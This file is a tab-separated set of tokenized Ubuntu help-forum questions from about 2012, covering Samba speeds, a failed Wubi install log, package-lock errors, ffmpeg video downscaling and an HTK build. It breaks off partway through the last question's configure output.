178494	very very slow transfer speeds between windows 7 and samba server running on ubuntu 11.10/12.04 minimal	as mentioned in the title i tried transferring files between windows 7 and the samba server running on both ubuntu 11.10 and 12.04 but both showed very slow transfer speeds . can someone please guide me in the right direction to debug this problem ? wget -- output-document=/dev/null http : //tokyo1.linode.com/100mb-tokyo.bin -- 2012-08-21 22:02:17 -- http : //tokyo1.linode.com/100mb-tokyo.bin resolving tokyo1.linode.com ( tokyo1.linode.com ) ... 106.187.33.12 connecting to tokyo1.linode.com ( tokyo1.linode.com ) |106.187.33.12|:80 ... connected . http request sent , awaiting response ... 200 ok length : 104857600 ( 100m ) [ application/octet-stream ] saving to : `/dev/null' 8 % [ ============= > ] 8,923,980 64.8k/s eta 15m 0s wlan0 ieee 802.11abgn essid : '' tnet '' mode : managed frequency:2.462 ghz access point : 58:6d:8f:26:20:7a bit rate=117 mb/s tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=57/70 signal level=-53 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:101 invalid misc:2448 missed beacon:0 03:00.0 network controller : atheros communications inc. ar9300 wireless lan adaptor ( rev 01 ) subsystem : atheros communications inc. device 3112 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx+ latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 16 region 0 : memory at fea00000 ( 64-bit , non-prefetchable ) [ size=128k ] expansion rom at fea20000 [ disabled ] [ size=64k ] capabilities : [ 40 ] power management version 3 flags : pmeclk- dsi- d1+ d2- auxcurrent=375ma pme ( d0+ , d1+ , d2- , d3hot+ , d3cold- ) status : d0 nosoftrst- pme-enable- dsel=0 dscale=0 pme- capabilities : [ 50 ] msi : enable- count=1/4 maskable+ 64bit+ address : 0000000000000000 data : 0000 masking : 00000000 pending : 00000000 capabilities : [ 70 ] express ( v2 ) endpoint , msi 00 devcap : maxpayload 128 bytes , phantfunc 0 , latency l0s < 1us , l1 < 8us exttag- attnbtn- attnind- pwrind- rbe+ flreset- devctl : report errors : correctable- non-fatal- fatal- unsupported- rlxdord- exttag- phantfunc- auxpwr- nosnoop- maxpayload 128 bytes , maxreadreq 512 bytes devsta : correrr- uncorrerr- fatalerr- unsuppreq- auxpwr- transpend- lnkcap : port # 0 , speed 2.5gt/s , width x1 , aspm l0s l1 , latency l0 < 2us , l1 < 64us clockpm- surprise- llactrep- bwnot- lnkctl : aspm disabled ; rcb 64 bytes disabled- retrain- commclk+ extsynch- clockpm- autwiddis- bwint- autbwint- lnksta : speed 2.5gt/s , width x1 , trerr- train- slotclk+ dlactive- bwmgmt- abwmgmt- devcap2 : completion timeout : not supported , timeoutdis+ devctl2 : completion timeout : 50us to 50ms , timeoutdis- lnkctl2 : target link speed : 2.5gt/s , entercompliance- speeddis- , selectable de-emphasis : -6db transmit margin : normal operating range , entermodifiedcompliance- compliancesos- compliance de-emphasis : -6db lnksta2 : current de-emphasis level : -6db capabilities : [ 100 v1 ] advanced error reporting uesta : dlp- sdes- tlp- fcp- cmpltto- cmpltabrt- unxcmplt- rxof- malftlp- ecrc- unsupreq- acsviol- uemsk : dlp- sdes- tlp- fcp- cmpltto- cmpltabrt- unxcmplt- rxof- malftlp- ecrc- unsupreq- acsviol- uesvrt : dlp+ sdes+ tlp- fcp+ cmpltto- cmpltabrt- unxcmplt- rxof+ malftlp+ ecrc- unsupreq- acsviol- cesta : rxerr- badtlp- baddllp- rollover- timeout- nonfatalerr- cemsk : rxerr- badtlp- baddllp- rollover- timeout- nonfatalerr+ aercap : first error pointer : 00 , gencap- cgenen- chkcap- chken- capabilities : [ 140 v1 ] virtual channel caps : lpevc=0 refclk=100ns patentrybits=1 arb : fixed- wrr32- wrr64- wrr128- ctrl : arbselect=fixed status : inprogress- vc0 : caps : patoffset=00 maxtimeslots=1 rejsnooptrans- arb : fixed- wrr32- wrr64- wrr128- twrr128- wrr256- ctrl : enable+ id=0 arbselect=fixed tc/vc=01 status : negopending- inprogress- capabilities : [ 300 v1 ] device serial number 00-00-00-00-00-00-00-00 kernel driver in use : ath9k kernel modules : ath9k
178498	ubuntu installation failed using wubi	i am trying to install ubuntu in a 40gb drive in my laptop , installer is downloading and installing ; but in the end , it pops an error that the installation failed . why is this happening ? now i am unable to install ubuntu in my laptop . i have tried this for 3 times but same error ( saying that some temp/app data is missing ) error executing command commmand=c : users\prasad\appdata\local|temp|pyl91c3\bin\resize2fs.exe-f g : \ubuntu\disks\root.disk 4744m retval=1 stderr= stdout=resize2fs1.40.6 ( 9 feb 2008 ) usage : /cgdrive/c/user/prasad/appdata\local|temp|pyl91c3\bin\resize2fs.exe-f g : \ubuntu\disks\root.disk 4744m [ -d debug_flags ] [ -f ] [ -f ] [ -p ] device [ new_size ] more information : wubi-12.04 rev266.log this is the message of error in rev266.log . 08-20 08:10 info root : === wubi 12.04 rev266 === 08-20 08:10 debug root : logfile is c : \users\prasad's\appdata\local\temp\wubi-12.04-rev266.log 08-20 08:10 debug root : sys.argv = [ 'main.pyo ' , ' -- exefile= '' c : \\users\\prasad\'s\\downloads\\wubi.exe '' ' ] 08-20 08:10 debug commonbackend : data_dir=c : \users\prasad's\appdata\local\temp\pyl58aa.tmp\data 08-20 08:10 debug windowsbackend : 7z=c : \users\prasad's\appdata\local\temp\pyl58aa.tmp\bin\7z.exe 08-20 08:10 debug windowsbackend : startup_folder=c : \programdata\microsoft\windows\start menu\programs\startup 08-20 08:10 debug commonbackend : fetching basic info ... 08-20 08:10 debug commonbackend : original_exe=c : \users\prasad's\downloads\wubi.exe 08-20 08:10 debug commonbackend : platform=win32 08-20 08:10 debug commonbackend : osname=nt 08-20 08:10 debug commonbackend : language=en_us 08-20 08:10 debug commonbackend : encoding=cp1252 08-20 08:10 debug windowsbackend : arch=amd64 08-20 08:10 debug commonbackend : parsing isolist=c : \users\prasad's\appdata\local\temp\pyl58aa.tmp\data\isolist.ini 08-20 08:10 debug commonbackend : adding distro xubuntu-i386 08-20 08:10 debug commonbackend : adding distro edubuntu-i386 08-20 08:10 debug commonbackend : adding distro xubuntu-amd64 08-20 08:10 debug commonbackend : adding distro kubuntu-amd64 08-20 08:10 debug commonbackend : adding distro mythbuntu-i386 08-20 08:10 debug commonbackend : adding distro edubuntu-amd64 08-20 08:10 debug commonbackend : adding distro ubuntu-amd64 08-20 08:10 debug commonbackend : adding distro lubuntu-i386 08-20 08:10 debug commonbackend : adding distro ubuntu-i386 08-20 08:10 debug commonbackend : adding distro mythbuntu-amd64 08-20 08:10 debug commonbackend : adding distro kubuntu-i386 08-20 08:10 debug commonbackend : adding distro lubuntu-amd64 08-20 08:10 debug windowsbackend : fetching host info ... 08-20 08:10 debug windowsbackend : registry_key=software\microsoft\windows\currentversion\uninstall\wubi 08-20 08:10 debug windowsbackend : windows version=vista 08-20 08:10 debug windowsbackend : windows_version2=windows 7 ultimate 08-20 08:10 debug windowsbackend : windows_sp=none 08-20 08:10 debug windowsbackend : windows_build=7600 08-20 08:10 debug windowsbackend : gmt=5 08-20 08:10 debug windowsbackend : country=us 08-20 08:10 debug windowsbackend : timezone=america/new_york 08-20 08:10 debug windowsbackend : windows_username=prasad's 08-20 08:10 debug windowsbackend : user_full_name=prasad's 08-20 08:10 debug windowsbackend : user_directory=c : \users\prasad's 08-20 08:10 debug windowsbackend : windows_language_code=1033 08-20 08:10 debug windowsbackend : windows_language=english 08-20 08:10 debug windowsbackend : processor_name=intel ( r ) core ( tm ) i3-2370m cpu @ 2.40ghz 08-20 08:10 debug windowsbackend : bootloader=vista 08-20 08:10 debug windowsbackend : system_drive=drive ( c : hd 75852.640625 mb free ntfs ) 08-20 08:10 debug windowsbackend : drive=drive ( c : hd 75852.640625 mb free ntfs ) 08-20 08:10 debug windowsbackend : drive=drive ( d : hd 99817.5976563 mb free ntfs ) 08-20 08:10 debug windowsbackend : drive=drive ( e : hd 74982.96875 mb free ntfs ) 08-20 08:10 debug windowsbackend : drive=drive ( f : hd 159197.234375 mb free ntfs ) 08-20 08:10 debug windowsbackend : drive=drive ( g : hd 39500.421875 mb free ntfs ) 08-20 08:10 debug windowsbackend : drive=drive ( i : removable 14745.6484375 mb free fat32 ) 08-20 08:10 debug windowsbackend : uninstaller_path=none 08-20 08:10 debug windowsbackend : previous_target_dir=none 08-20 08:10 debug windowsbackend : previous_distro_name=none 08-20 08:10 debug windowsbackend : keyboard_id=67699721 08-20 08:10 debug windowsbackend : keyboard_layout=us 08-20 08:10 debug windowsbackend : keyboard_variant= 08-20 08:10 debug commonbackend : python locale= ( 'en_us ' , 'cp1252 ' ) 08-20 08:10 debug commonbackend : locale=en_us.utf-8 08-20 08:10 debug windowsbackend : total_memory_mb=2047.99999905 08-20 08:10 debug commonbackend : searching isos on usb devices 08-20 08:10 debug commonbackend : searching for local cds 08-20 08:10 debug distro : checking whether c : \users\prasad's\appdata\local\temp\pyl58aa.tmp is a valid ubuntu cd 08-20 08:10 debug distro : does not contain c : \users\prasad's\appdata\local\temp\pyl58aa.tmp\casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether c : \users\prasad's\appdata\local\temp\pyl58aa.tmp is a valid ubuntu cd 08-20 08:10 debug distro : does not contain c : \users\prasad's\appdata\local\temp\pyl58aa.tmp\casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether c : \users\prasad's\appdata\local\temp\pyl58aa.tmp is a valid kubuntu cd 08-20 08:10 debug distro : does not contain c : \users\prasad's\appdata\local\temp\pyl58aa.tmp\casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether c : \users\prasad's\appdata\local\temp\pyl58aa.tmp is a valid kubuntu cd 08-20 08:10 debug distro : does not contain c : \users\prasad's\appdata\local\temp\pyl58aa.tmp\casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether c : \users\prasad's\appdata\local\temp\pyl58aa.tmp is a valid xubuntu cd 08-20 08:10 debug distro : does not contain c : \users\prasad's\appdata\local\temp\pyl58aa.tmp\casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether c : \users\prasad's\appdata\local\temp\pyl58aa.tmp is a valid xubuntu cd 08-20 08:10 debug distro : does not contain c : \users\prasad's\appdata\local\temp\pyl58aa.tmp\casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether c : \users\prasad's\appdata\local\temp\pyl58aa.tmp is a valid mythbuntu cd 08-20 08:10 debug distro : does not contain c : \users\prasad's\appdata\local\temp\pyl58aa.tmp\casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether c : \users\prasad's\appdata\local\temp\pyl58aa.tmp is a valid mythbuntu cd 08-20 08:10 debug distro : does not contain c : \users\prasad's\appdata\local\temp\pyl58aa.tmp\casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether c : \users\prasad's\appdata\local\temp\pyl58aa.tmp is a valid edubuntu cd 08-20 08:10 debug distro : does not contain c : \users\prasad's\appdata\local\temp\pyl58aa.tmp\casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether c : \users\prasad's\appdata\local\temp\pyl58aa.tmp is a valid edubuntu cd 08-20 08:10 debug distro : does not contain c : \users\prasad's\appdata\local\temp\pyl58aa.tmp\casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether c : \users\prasad's\appdata\local\temp\pyl58aa.tmp is a valid lubuntu cd 08-20 08:10 debug distro : does not contain c : \users\prasad's\appdata\local\temp\pyl58aa.tmp\casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether c : \users\prasad's\appdata\local\temp\pyl58aa.tmp is a valid lubuntu cd 08-20 08:10 debug distro : does not contain c : \users\prasad's\appdata\local\temp\pyl58aa.tmp\casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether d : \ is a valid ubuntu cd 08-20 08:10 debug distro : does not contain d : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether d : \ is a valid ubuntu cd 08-20 08:10 debug distro : does not contain d : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether d : \ is a valid kubuntu cd 08-20 08:10 debug distro : does not contain d : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether d : \ is a valid kubuntu cd 08-20 08:10 debug distro : does not contain d : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether d : \ is a valid xubuntu cd 08-20 08:10 debug distro : does not contain d : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether d : \ is a valid xubuntu cd 08-20 08:10 debug distro : does not contain d : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether d : \ is a valid mythbuntu cd 08-20 08:10 debug distro : does not contain d : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether d : \ is a valid mythbuntu cd 08-20 08:10 debug distro : does not contain d : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether d : \ is a valid edubuntu cd 08-20 08:10 debug distro : does not contain d : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether d : \ is a valid edubuntu cd 08-20 08:10 debug distro : does not contain d : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether d : \ is a valid lubuntu cd 08-20 08:10 debug distro : does not contain d : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether d : \ is a valid lubuntu cd 08-20 08:10 debug distro : does not contain d : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether e : \ is a valid ubuntu cd 08-20 08:10 debug distro : does not contain e : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether e : \ is a valid ubuntu cd 08-20 08:10 debug distro : does not contain e : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether e : \ is a valid kubuntu cd 08-20 08:10 debug distro : does not contain e : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether e : \ is a valid kubuntu cd 08-20 08:10 debug distro : does not contain e : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether e : \ is a valid xubuntu cd 08-20 08:10 debug distro : does not contain e : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether e : \ is a valid xubuntu cd 08-20 08:10 debug distro : does not contain e : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether e : \ is a valid mythbuntu cd 08-20 08:10 debug distro : does not contain e : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether e : \ is a valid mythbuntu cd 08-20 08:10 debug distro : does not contain e : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether e : \ is a valid edubuntu cd 08-20 08:10 debug distro : does not contain e : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether e : \ is a valid edubuntu cd 08-20 08:10 debug distro : does not contain e : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether e : \ is a valid lubuntu cd 08-20 08:10 debug distro : does not contain e : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether e : \ is a valid lubuntu cd 08-20 08:10 debug distro : does not contain e : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether f : \ is a valid ubuntu cd 08-20 08:10 debug distro : does not contain f : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether f : \ is a valid ubuntu cd 08-20 08:10 debug distro : does not contain f : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether f : \ is a valid kubuntu cd 08-20 08:10 debug distro : does not contain f : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether f : \ is a valid kubuntu cd 08-20 08:10 debug distro : does not contain f : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether f : \ is a valid xubuntu cd 08-20 08:10 debug distro : does not contain f : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether f : \ is a valid xubuntu cd 08-20 08:10 debug distro : does not contain f : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether f : \ is a valid mythbuntu cd 08-20 08:10 debug distro : does not contain f : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether f : \ is a valid mythbuntu cd 08-20 08:10 debug distro : does not contain f : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether f : \ is a valid edubuntu cd 08-20 08:10 debug distro : does not contain f : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether f : \ is a valid edubuntu cd 08-20 08:10 debug distro : does not contain f : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether f : \ is a valid lubuntu cd 08-20 08:10 debug distro : does not contain f : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether f : \ is a valid lubuntu cd 08-20 08:10 debug distro : does not contain f : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether g : \ is a valid ubuntu cd 08-20 08:10 debug distro : does not contain g : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether g : \ is a valid ubuntu cd 08-20 08:10 debug distro : does not contain g : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether g : \ is a valid kubuntu cd 08-20 08:10 debug distro : does not contain g : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether g : \ is a valid kubuntu cd 08-20 08:10 debug distro : does not contain g : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether g : \ is a valid xubuntu cd 08-20 08:10 debug distro : does not contain g : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether g : \ is a valid xubuntu cd 08-20 08:10 debug distro : does not contain g : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether g : \ is a valid mythbuntu cd 08-20 08:10 debug distro : does not contain g : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether g : \ is a valid mythbuntu cd 08-20 08:10 debug distro : does not contain g : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether g : \ is a valid edubuntu cd 08-20 08:10 debug distro : does not contain g : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether g : \ is a valid edubuntu cd 08-20 08:10 debug distro : does not contain g : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether g : \ is a valid lubuntu cd 08-20 08:10 debug distro : does not contain g : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether g : \ is a valid lubuntu cd 08-20 08:10 debug distro : does not contain g : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether i : \ is a valid ubuntu cd 08-20 08:10 debug distro : does not contain i : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether i : \ is a valid ubuntu cd 08-20 08:10 debug distro : does not contain i : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether i : \ is a valid kubuntu cd 08-20 08:10 debug distro : does not contain i : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether i : \ is a valid kubuntu cd 08-20 08:10 debug distro : does not contain i : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether i : \ is a valid xubuntu cd 08-20 08:10 debug distro : does not contain i : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether i : \ is a valid xubuntu cd 08-20 08:10 debug distro : does not contain i : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether i : \ is a valid mythbuntu cd 08-20 08:10 debug distro : does not contain i : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether i : \ is a valid mythbuntu cd 08-20 08:10 debug distro : does not contain i : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether i : \ is a valid edubuntu cd 08-20 08:10 debug distro : does not contain i : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether i : \ is a valid edubuntu cd 08-20 08:10 debug distro : does not contain i : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether i : \ is a valid lubuntu cd 08-20 08:10 debug distro : does not contain i : \casper\filesystem.squashfs 08-20 08:10 debug distro : checking whether i : \ is a valid lubuntu cd 08-20 08:10 debug distro : does not contain i : \casper\filesystem.squashfs 08-20 08:10 info root : running the installer ... 08-20 08:10 debug windowsfrontend : __init__ ... 08-20 08:10 debug windowsfrontend : on_init ... 08-20 08:10 info winuipage : appname=wubi , localedir=c : \users\prasad's\appdata\local\temp\pyl58aa.tmp\translations , languages= [ 'en_us ' , 'en ' ] 08-20 08:10 info winuipage : appname=wubi , localedir=c : \users\prasad's\appdata\local\temp\pyl58aa.tmp\translations , languages= [ 'en_us ' , 'en ' ] 08-20 08:10 debug windowsfrontend : frontend.on_quit 08-20 08:10 debug root : application.on_quit 08-20 08:10 info root : sys.exit
178499	install ubuntu 12.04 on dell xps 8500	i 'm thinking of replacing my elderly dell dimension 5150 with an xps 8500 , but the only reference to this pc 's compatibility with ubuntu mentions to a video failure on booting up , with no solution recorded . has anyone installed ubuntu 12.04 on this model ?
178502	pen drive lifetime issues when running os from it	i intend to install ubuntu onto a 32gb pendrive . i 've heard that the lifetime of a pendrive will reduce drastically due to the large number of read/writes due to running /tmp from pendrive . does this issue really affect modern pendrives and how to use the ram as tmpfs instead of having /tmp in the pendrive ?
178503	java installation on ubuntu 12.04	can you please help me install java on buntu 12.04 please explain to me as someone who never used ubuntu in his entire life step by step with pictures if possible . i am new to this os & many advisers start just in the middle whereas new users do n't even know how to get to other parts i am using 32 bit & installed ubuntu 12.04 .
178504	synaptic package manager looking bad under gnome shell [ ubuntu 12.04 ]	this is my first question and i really hope that is has not been answered anywhere , as i could not find it during the search i performed . i am working under ubuntu 12.04 lts and gnome shell ( gnome 3 ) . i have installed synaptic package manager , which is working great , but the problem is that its looks are awful . it looks like there is a classic theme applied to the synaptic windows only , except for the window title bar . unfortunately , i can not post a screenshot yet . the same issue exists on the adobe reader ( 9.5.1 ) too , where the popup menu texts are barely visible on high brightness . could this happen due to the some missing gtk2 libraries ? any help appreciated .
178505	how to resume interrupted installation in synaptic manager ?	i use lubuntu 12.04 and have tried to install lubuntu-restricted-extras in synaptic . it seemed stuck at one point : when asked to accept some microsoft eula for fonts ( i guess ) , i hit enter and it seemed to me that i could not do anything but try to shut down synaptic , which i could not do and finally logged out . maybe i should not have done that but that is what i did . after logging in and then after reboot , no installation would start , as if synaptic was still working . the problem seems to be with the installation of lubuntu-restricted-extras being incomplete . what is it to be done ? when i type sudo dpkg -- configure -a i get : dpkg : error : dpkg status database is locked by another process i found here that i could type sudo rm /var/lib/dpkg/lock before sudo dpkg -- configure -a and then update ( works ok ) and upgrade , at which point i get $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : linux-generic linux-headers-generic linux-image-generic the following packages will be upgraded : accountsservice apparmor apport apport-gtk apt apt-transport-https apt-utils aptdaemon aptdaemon-data audacious-plugins audacious-plugins-data base-files bind9-host blueman cron cups cups-client cups-common cups-driver-gutenprint cups-filters cups-ppdc dconf-gsettings-backend dconf-service desktop-file-utils dmsetup dnsutils evince evince-common firefox-locale-en fonts-liberation foomatic-filters ghostscript ghostscript-cups ghostscript-x gir1.2-gtk-3.0 gir1.2-pango-1.0 glib-networking glib-networking-common glib-networking-services gnome-icon-theme gnome-icon-theme-full grub-common grub-pc grub-pc-bin grub2-common gstreamer0.10-plugins-base hdparm initscripts isc-dhcp-client isc-dhcp-common jockey-common jockey-gtk krb5-locales libaccountsservice0 libapt-inst1.4 libapt-pkg4.12 libasound2 libbind9-80 libcairo-gobject2 libcairo2 libcups2 libcupscgi1 libcupsfilters1 libcupsimage2 libcupsmime1 libcupsppdc1 libdbusmenu-glib4 libdbusmenu-gtk3-4 libdconf0 libdevmapper-event1.02.1 libdevmapper1.02.1 libdns81 libevince3-3 libexif12 libexpat1 libfm-data libfm-gtk-data libfm-gtk1 libfm1 libgail-3-0 libgcrypt11 libgl1-mesa-dri libgl1-mesa-glx libglade2-0 libglapi-mesa libglib2.0-0 libglib2.0-bin libglib2.0-data libglu1-mesa libgnutls26 libgphoto2-2 libgphoto2-port0 libgrip0 libgs9 libgs9-common libgssapi-krb5-2 libgstreamer-plugins-base0.10-0 libgtk-3-0 libgtk-3-bin libgtk-3-common libgudev-1.0-0 libgutenprint2 libisc83 libisccc80 libisccfg82 libjavascriptcoregtk-1.0-0 libjpeg-turbo8 libk5crypto3 libkrb5-3 libkrb5support0 liblaunchpad-integration-3.0-1 liblaunchpad-integration-common liblaunchpad-integration1 libldap-2.4-2 liblightdm-gobject-1-0 liblvm2app2.2 liblwres80 libmtp-common libmtp9 libnautilus-extension1a libnm-glib-vpn1 libnm-glib4 libnm-util2 libpango1.0-0 libperl5.14 libpolkit-agent-1-0 libpolkit-backend-1-0 libpolkit-gobject-1-0 libpulse-mainloop-glib0 libpulse0 libpurple0 libpython2.7 libsasl2-2 libsasl2-modules libsmbclient libsqlite3-0 libssl1.0.0 libtasn1-3 libtiff4 libudev0 libutouch-geis1 libv4l-0 libv4lconvert0 libwbclient0 libwebkitgtk-1.0-0 libwebkitgtk-1.0-common libxatracker1 libxkbfile1 libxml2 libxslt1.1 lightdm lxkeymap nautilus-data network-manager ntp ntpdate openssl perl perl-base perl-modules pidgin pidgin-data policykit-1 printer-driver-gutenprint psmisc python-apport python-aptdaemon python-aptdaemon.gtk3widgets python-cupshelpers python-gi python-gobject python-libxml2 python-problem-report python-software-properties python2.7 python2.7-minimal resolvconf shared-mime-info simple-scan software-properties-common software-properties-gtk ssl-cert sudo system-config-printer-common system-config-printer-gnome sysv-rc sysvinit-utils ttf-mscorefonts-installer udev udisks update-manager update-manager-core update-notifier update-notifier-common upstart vim-common vim-tiny xkb-data xserver-common xserver-xorg-core xserver-xorg-input-evdev xserver-xorg-input-synaptics xserver-xorg-input-vmmouse xserver-xorg-video-intel xserver-xorg-video-vmware 205 upgraded , 0 newly installed , 0 to remove and 3 not upgraded . 1 not fully installed or removed . e : could not get lock /var/cache/apt/archives/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/cache/apt/archives/ synaptic can be opened , which did not happened before . but when i try to install lubuntu-restricted-extras in synaptic i get this : e : could not get lock /var/cache/apt/archives/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the download directory
178506	downsize video for use on android phone	i 've got some 1080p movies on my ubuntu system , which i 'd like to trasfer to my android phone for when i 'm in a situation where i have nothing to do ( like an absent teacher at school ) . my phone screen has a resolution of 480*320 . i 've tried this command ; ffmpeg -i movie.mp4 -vf scale=480 : ih*480/iw downsized.mp4 and it changes the resolution of the video , but the file is not as small as i 'd like it to be . what else can i do to get the file as small as possible ? perhaps change the audio quality and framerate to something lower ( i 'm guessing 1080p video has better audio quality than my phone 's sound card supports anyway ) . i 'd like to keep the sound at the best quality the phone supports and the human ear can still hear . i 'd also like to convert the sound from surround to stereo . is there perhaps a different file format that 's smaller and supported by android 2.3 ? thanks in advance .
178508	`` /usr/bin/ld : can not find -lx11 '' error when installing htk	i am trying to use htk ( hmm tool kit ) for speech recognition . i follow the instruction guideline in 'readme ' file . firstly , i typed './configure ' and it worked . followings are terminal output when i typed './configure ' . checking whether make sets $ ( make ) ... yes checking for gawk ... no checking for mawk ... mawk checking for gcc ... gcc checking for c compiler default output file name ... a.out checking whether the c compiler works ... yes checking whether we are cross compiling ... no checking for suffix of executables ... checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept iso c89 ... none needed checking for a bsd-compatible install ... /usr/bin/install -c checking whether ln -s works ... yes checking for ranlib ... ranlib checking for main in -lx11 ... yes checking for main in -lm ... yes checking how to run the c preprocessor ... gcc -e checking for x ... libraries , headers checking for grep that handles long lines and -e ... /bin/grep checking for egrep ... /bin/grep -e checking for ansi c header files ... yes checking for sys/types.h ... yes checking for sys/stat.h ... yes checking for stdlib.h ... yes checking for string.h ... yes checking for memory.h ... yes checking for strings.h ... yes checking for inttypes.h ... yes checking for stdint.h ... yes checking for unistd.h ... yes checking errno.h usability ... yes checking errno.h presence ... yes checking for errno.h ... yes checking fcntl.h usability ... yes checking fcntl.h presence ... yes checking for fcntl.h ... yes checking float.h usability ... yes checking float.h presence ... yes checking for float.h ... yes checking limits.h usability ... yes checking limits.h presence ... yes checking for limits.h ... yes checking malloc.h usability ... yes checking malloc.h presence ... yes checking for malloc.h ... yes checking for memory.h ... ( cached ) yes checking for stdlib.h ... ( cached ) yes checking for string.h ... ( cached ) yes checking sys/ioctl.h usability ... yes checking sys/ioctl.h presence ... yes checking for sys/ioctl.h ... yes checking sys/socket.h usability ... yes checking sys/socket.h presence ... yes checking for sys/socket.h ... yes checking sys/time.h usability ... yes checking sys/time.h presence ... yes checking for sys/time.h ... yes checking for unistd.h ... ( cached ) yes checking for an ansi c-conforming const ... yes checking for size_t ... yes checking whether time.h and sys/time.h may both be included ... yes checking whether struct tm is in sys/time.h or time.h ... time.h checking whether gcc needs -traditional ... no checking for working memcmp ... yes checking for stdlib.h ... ( cached ) yes checking for gnu libc compatible malloc ... yes checking for working strtod ... yes checking return type of signal handlers ... void checking for vprintf ... yes checking for _doprnt ... no checking for floor ... yes checking for gettimeofday ... yes checking for memmove ... yes checking for memset ... yes checking for modf ... yes checking for pow ... yes checking for socket ... yes checking for sqrt ... yes checking for strchr ... yes checking for strcspn ... yes checking for strrchr ... yes checking for strspn ... yes checking for strstr ... yes checking for strtol ... yes checking build system type ... x86_64-unknown-linux-gnu checking host system type ... x86_64-unknown-linux-gnu configure : creating ./config.status config.status : creating htklib/makefile config.status : warning : htklib/makefile.in seems to ignore the -- datarootdir setting config.status : creating htktools/makefile config.status : warning : htktools/makefile.in seems to ignore the -- datarootdir setting config.status : creating hlmlib/makefile config.status : warning : hlmlib/makefile.in seems to ignore the -- datarootdir setting config.status : creating hlmtools/makefile config.status : warning : hlmtools/makefile.in seems to ignore the -- datarootdir setting config.status : creating htklvrec/makefile config.status : warning : htklvrec/makefile.in seems to ignore the -- datarootdir setting config.status : creating makefile config.status : warning : makefile.in seems to ignore the -- datarootdir setting ************************************************** htk is now ready to be built . type `` make all '' to build the htk libraries and tools . then `` make install '' to install them . the tools will be installed in /usr/local/bin build notes : language modelling tools will be built . hdecode will not be built . you can build it manually later by running 'make hdecode 